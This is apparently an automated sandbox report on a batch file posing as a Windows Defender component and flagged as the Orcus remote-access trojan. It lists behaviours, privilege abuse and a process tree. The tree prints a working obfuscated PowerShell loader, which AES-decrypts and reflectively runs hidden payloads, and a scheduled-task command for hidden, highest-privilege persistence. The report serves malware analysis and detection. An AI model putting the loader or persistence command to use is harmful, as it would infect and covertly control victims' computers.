Analysis
-
max time kernel
28s -
max time network
17s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 20:38
Static task
static1
Behavioral task
behavioral1
Sample
MpDefenderCoreProtection.bat
Resource
win7-20241010-en
General
-
Target
MpDefenderCoreProtection.bat
-
Size
3.8MB
-
MD5
8e550a5c4dfd929f9569d55f70eae366
-
SHA1
4d594deeeb29fd8501e0f81a351efe4b9220b939
-
SHA256
8283f48cec6ebef1bdd41cfd9769f11db127ff431a71002b25112bb79b0b0122
-
SHA512
d00a931f7c388589a0f267737c47a7fb348cb2eb457daf15d582b533301513a3eda0e190eb23fe7aa19fd81714d5f90a537e2382b574cbd87bdc964823bab92d
-
SSDEEP
49152:yir7trkN31WUqslOGw9m1YmK2CalCFp0+UR:yP
Malware Config
Signatures
-
Orcus family
-
Orcurs Rat Executable 1 IoCs
resource yara_rule behavioral2/memory/2676-145-0x0000024D4D390000-0x0000024D4D692000-memory.dmp orcus -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5076 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation MpDefenderCoreProtection.exe -
Executes dropped EXE 1 IoCs
pid Process 4940 MpDefenderCoreProtection.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\Windows Defender\MpDefenderCoreProtection.exe powershell.exe File opened for modification C:\Program Files\Windows Defender\MpDefenderCoreProtection.exe powershell.exe File created C:\Program Files\Windows Defender\MpDefenderCoreProtection.exe.config powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00F983B571E" svchost.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 436 powershell.exe 436 powershell.exe 5076 powershell.exe 5076 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 5076 powershell.exe Token: SeIncreaseQuotaPrivilege 5076 powershell.exe Token: SeSecurityPrivilege 5076 powershell.exe Token: SeTakeOwnershipPrivilege 5076 powershell.exe Token: SeLoadDriverPrivilege 5076 powershell.exe Token: SeSystemProfilePrivilege 5076 powershell.exe Token: SeSystemtimePrivilege 5076 powershell.exe Token: SeProfSingleProcessPrivilege 5076 powershell.exe Token: SeIncBasePriorityPrivilege 5076 powershell.exe Token: SeCreatePagefilePrivilege 5076 powershell.exe Token: SeBackupPrivilege 5076 powershell.exe Token: SeRestorePrivilege 5076 powershell.exe Token: SeShutdownPrivilege 5076 powershell.exe Token: SeDebugPrivilege 5076 powershell.exe Token: SeSystemEnvironmentPrivilege 5076 powershell.exe Token: SeRemoteShutdownPrivilege 5076 powershell.exe Token: SeUndockPrivilege 5076 powershell.exe Token: SeManageVolumePrivilege 5076 powershell.exe Token: 33 5076 powershell.exe Token: 34 5076 powershell.exe Token: 35 5076 powershell.exe Token: 36 5076 powershell.exe Token: SeIncreaseQuotaPrivilege 5076 powershell.exe Token: SeSecurityPrivilege 5076 powershell.exe Token: SeTakeOwnershipPrivilege 5076 powershell.exe Token: SeLoadDriverPrivilege 5076 powershell.exe Token: SeSystemProfilePrivilege 5076 powershell.exe Token: SeSystemtimePrivilege 5076 powershell.exe Token: SeProfSingleProcessPrivilege 5076 powershell.exe Token: SeIncBasePriorityPrivilege 5076 powershell.exe Token: SeCreatePagefilePrivilege 5076 powershell.exe Token: SeBackupPrivilege 5076 powershell.exe Token: SeRestorePrivilege 5076 powershell.exe Token: SeShutdownPrivilege 5076 powershell.exe Token: SeDebugPrivilege 5076 powershell.exe Token: SeSystemEnvironmentPrivilege 5076 powershell.exe Token: SeRemoteShutdownPrivilege 5076 powershell.exe Token: SeUndockPrivilege 5076 powershell.exe Token: SeManageVolumePrivilege 5076 powershell.exe Token: 33 5076 powershell.exe Token: 34 5076 powershell.exe Token: 35 5076 powershell.exe Token: 36 5076 powershell.exe Token: SeIncreaseQuotaPrivilege 5076 powershell.exe Token: SeSecurityPrivilege 5076 powershell.exe Token: SeTakeOwnershipPrivilege 5076 powershell.exe Token: SeLoadDriverPrivilege 5076 powershell.exe Token: SeSystemProfilePrivilege 5076 powershell.exe Token: SeSystemtimePrivilege 5076 powershell.exe Token: SeProfSingleProcessPrivilege 5076 powershell.exe Token: SeIncBasePriorityPrivilege 5076 powershell.exe Token: SeCreatePagefilePrivilege 5076 powershell.exe Token: SeBackupPrivilege 5076 powershell.exe Token: SeRestorePrivilege 5076 powershell.exe Token: SeShutdownPrivilege 5076 powershell.exe Token: SeDebugPrivilege 5076 powershell.exe Token: SeSystemEnvironmentPrivilege 5076 powershell.exe Token: SeRemoteShutdownPrivilege 5076 powershell.exe Token: SeUndockPrivilege 5076 powershell.exe Token: SeManageVolumePrivilege 5076 powershell.exe Token: 33 5076 powershell.exe Token: 34 5076 powershell.exe Token: 35 5076 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1648 wrote to memory of 2388 1648 cmd.exe 86 PID 1648 wrote to memory of 2388 1648 cmd.exe 86 PID 2388 wrote to memory of 1096 2388 net.exe 87 PID 2388 wrote to memory of 1096 2388 net.exe 87 PID 1648 wrote to memory of 992 1648 cmd.exe 88 PID 1648 wrote to memory of 992 1648 cmd.exe 88 PID 1648 wrote to memory of 436 1648 cmd.exe 89 PID 1648 wrote to memory of 436 1648 cmd.exe 89 PID 436 wrote to memory of 5076 436 powershell.exe 94 PID 436 wrote to memory of 5076 436 powershell.exe 94 PID 436 wrote to memory of 376 436 powershell.exe 97 PID 436 wrote to memory of 376 436 powershell.exe 97 PID 376 wrote to memory of 4588 376 WScript.exe 98 PID 376 wrote to memory of 4588 376 WScript.exe 98 PID 4588 wrote to memory of 772 4588 cmd.exe 100 PID 4588 wrote to memory of 772 4588 cmd.exe 100 PID 772 wrote to memory of 1928 772 net.exe 101 PID 772 wrote to memory of 1928 772 net.exe 101 PID 4588 wrote to memory of 4500 4588 cmd.exe 102 PID 4588 wrote to memory of 4500 4588 cmd.exe 102 PID 4588 wrote to memory of 2676 4588 cmd.exe 103 PID 4588 wrote to memory of 2676 4588 cmd.exe 103 PID 2676 wrote to memory of 3468 2676 powershell.exe 56 PID 2676 wrote to memory of 2752 2676 powershell.exe 48 PID 2676 wrote to memory of 776 2676 powershell.exe 8 PID 2676 wrote to memory of 1952 2676 powershell.exe 35 PID 2676 wrote to memory of 2148 2676 powershell.exe 40 PID 2676 wrote to memory of 1160 2676 powershell.exe 20 PID 2676 wrote to memory of 1152 2676 powershell.exe 19 PID 2676 wrote to memory of 948 2676 powershell.exe 12 PID 2676 wrote to memory of 1728 2676 powershell.exe 30 PID 2676 wrote to memory of 1916 2676 powershell.exe 34 PID 2676 wrote to memory of 1908 2676 powershell.exe 33 PID 2676 wrote to memory of 1512 2676 powershell.exe 27 PID 2676 wrote to memory of 5092 2676 powershell.exe 93 PID 2676 wrote to memory of 2288 2676 powershell.exe 41 PID 2676 wrote to memory of 2680 2676 powershell.exe 46 PID 2676 wrote to memory of 3664 2676 powershell.exe 69 PID 2676 wrote to memory of 1496 2676 powershell.exe 26 PID 2676 wrote to memory of 1100 2676 powershell.exe 18 PID 2676 wrote to memory of 1296 2676 powershell.exe 23 PID 2676 wrote to memory of 900 2676 powershell.exe 11 PID 2676 wrote to memory of 2080 2676 powershell.exe 39 PID 2676 wrote to memory of 700 2676 powershell.exe 14 PID 2676 wrote to memory of 3652 2676 powershell.exe 57 PID 2676 wrote to memory of 1680 2676 powershell.exe 29 PID 2676 wrote to memory of 1088 2676 powershell.exe 17 PID 2676 wrote to memory of 1284 2676 powershell.exe 22 PID 2676 wrote to memory of 5028 2676 powershell.exe 68 PID 2676 wrote to memory of 4028 2676 powershell.exe 65 PID 2676 wrote to memory of 1860 2676 powershell.exe 38 PID 2676 wrote to memory of 1444 2676 powershell.exe 25 PID 2676 wrote to memory of 1652 2676 powershell.exe 28 PID 2676 wrote to memory of 860 2676 powershell.exe 75 PID 2676 wrote to memory of 1252 2676 powershell.exe 21 PID 2676 wrote to memory of 4600 2676 powershell.exe 66 PID 2676 wrote to memory of 1432 2676 powershell.exe 24 PID 2676 wrote to memory of 2612 2676 powershell.exe 45 PID 2676 wrote to memory of 2408 2676 powershell.exe 43 PID 2676 wrote to memory of 2400 2676 powershell.exe 42 PID 2676 wrote to memory of 1804 2676 powershell.exe 32 PID 2676 wrote to memory of 812 2676 powershell.exe 16 PID 2676 wrote to memory of 1992 2676 powershell.exe 36 PID 2676 wrote to memory of 612 2676 powershell.exe 15 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:776
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵PID:1552
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1100
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1496
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:1860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2080
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3360
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3468
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreProtection.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:1096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/hTAPReKWMaGUPsxvh8SiiR41fumgY/9sRHXfHkctYs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6MgLmE5FNbYAX6X+qh2cDQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $isHBU=New-Object System.IO.MemoryStream(,$param_var); $ypwny=New-Object System.IO.MemoryStream; $uyyTu=New-Object System.IO.Compression.GZipStream($isHBU, [IO.Compression.CompressionMode]::Decompress); $uyyTu.CopyTo($ypwny); $uyyTu.Dispose(); $isHBU.Dispose(); $ypwny.Dispose(); $ypwny.ToArray();}function execute_function($param_var,$param2_var){ $eMguq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kekMw=$eMguq.EntryPoint; $kekMw.Invoke($null, $param2_var);}$sSYKO = 'C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreProtection.bat';$host.UI.RawUI.WindowTitle = $sSYKO;$McaeJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sSYKO).Split([Environment]::NewLine);foreach ($NljuN in $McaeJ) { if ($NljuN.StartsWith('ktRBTENuIsvsRLWHoTWR')) { $MZjQx=$NljuN.Substring(20); break; }}$payloads_var=[string[]]$MZjQx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_423_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_423.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_423.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_423.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\system32\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file7⤵PID:1928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/hTAPReKWMaGUPsxvh8SiiR41fumgY/9sRHXfHkctYs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6MgLmE5FNbYAX6X+qh2cDQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $isHBU=New-Object System.IO.MemoryStream(,$param_var); $ypwny=New-Object System.IO.MemoryStream; $uyyTu=New-Object System.IO.Compression.GZipStream($isHBU, [IO.Compression.CompressionMode]::Decompress); $uyyTu.CopyTo($ypwny); $uyyTu.Dispose(); $isHBU.Dispose(); $ypwny.Dispose(); $ypwny.ToArray();}function execute_function($param_var,$param2_var){ $eMguq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kekMw=$eMguq.EntryPoint; $kekMw.Invoke($null, $param2_var);}$sSYKO = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_423.bat';$host.UI.RawUI.WindowTitle = $sSYKO;$McaeJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sSYKO).Split([Environment]::NewLine);foreach ($NljuN in $McaeJ) { if ($NljuN.StartsWith('ktRBTENuIsvsRLWHoTWR')) { $MZjQx=$NljuN.Substring(20); break; }}$payloads_var=[string[]]$MZjQx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:4500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"6⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Program Files\Windows Defender\MpDefenderCoreProtection.exe"C:\Program Files\Windows Defender\MpDefenderCoreProtection.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:4940
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:5092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
PID:3508
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
357B
MD5a2b76cea3a59fa9af5ea21ff68139c98
SHA135d76475e6a54c168f536e30206578babff58274
SHA256f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839
SHA512b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.8MB
MD58e550a5c4dfd929f9569d55f70eae366
SHA14d594deeeb29fd8501e0f81a351efe4b9220b939
SHA2568283f48cec6ebef1bdd41cfd9769f11db127ff431a71002b25112bb79b0b0122
SHA512d00a931f7c388589a0f267737c47a7fb348cb2eb457daf15d582b533301513a3eda0e190eb23fe7aa19fd81714d5f90a537e2382b574cbd87bdc964823bab92d
-
Filesize
124B
MD5437636284742151140d752aa23633ae0
SHA12298ffbf6fc04c1a06e6560640f56bef60150d4b
SHA256850ba493d44471a73f0c091b0831b8eddd62b8f935defcff3ce0b4a75ee78905
SHA512f19cc79f86a4db8edde6f93f7e920a5948b04540b5d38eff469e1c5edfc585adadfc96872c3349d3aabac6f2d90a52dc616919945b3a943b96b0eb23d744e6a2
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4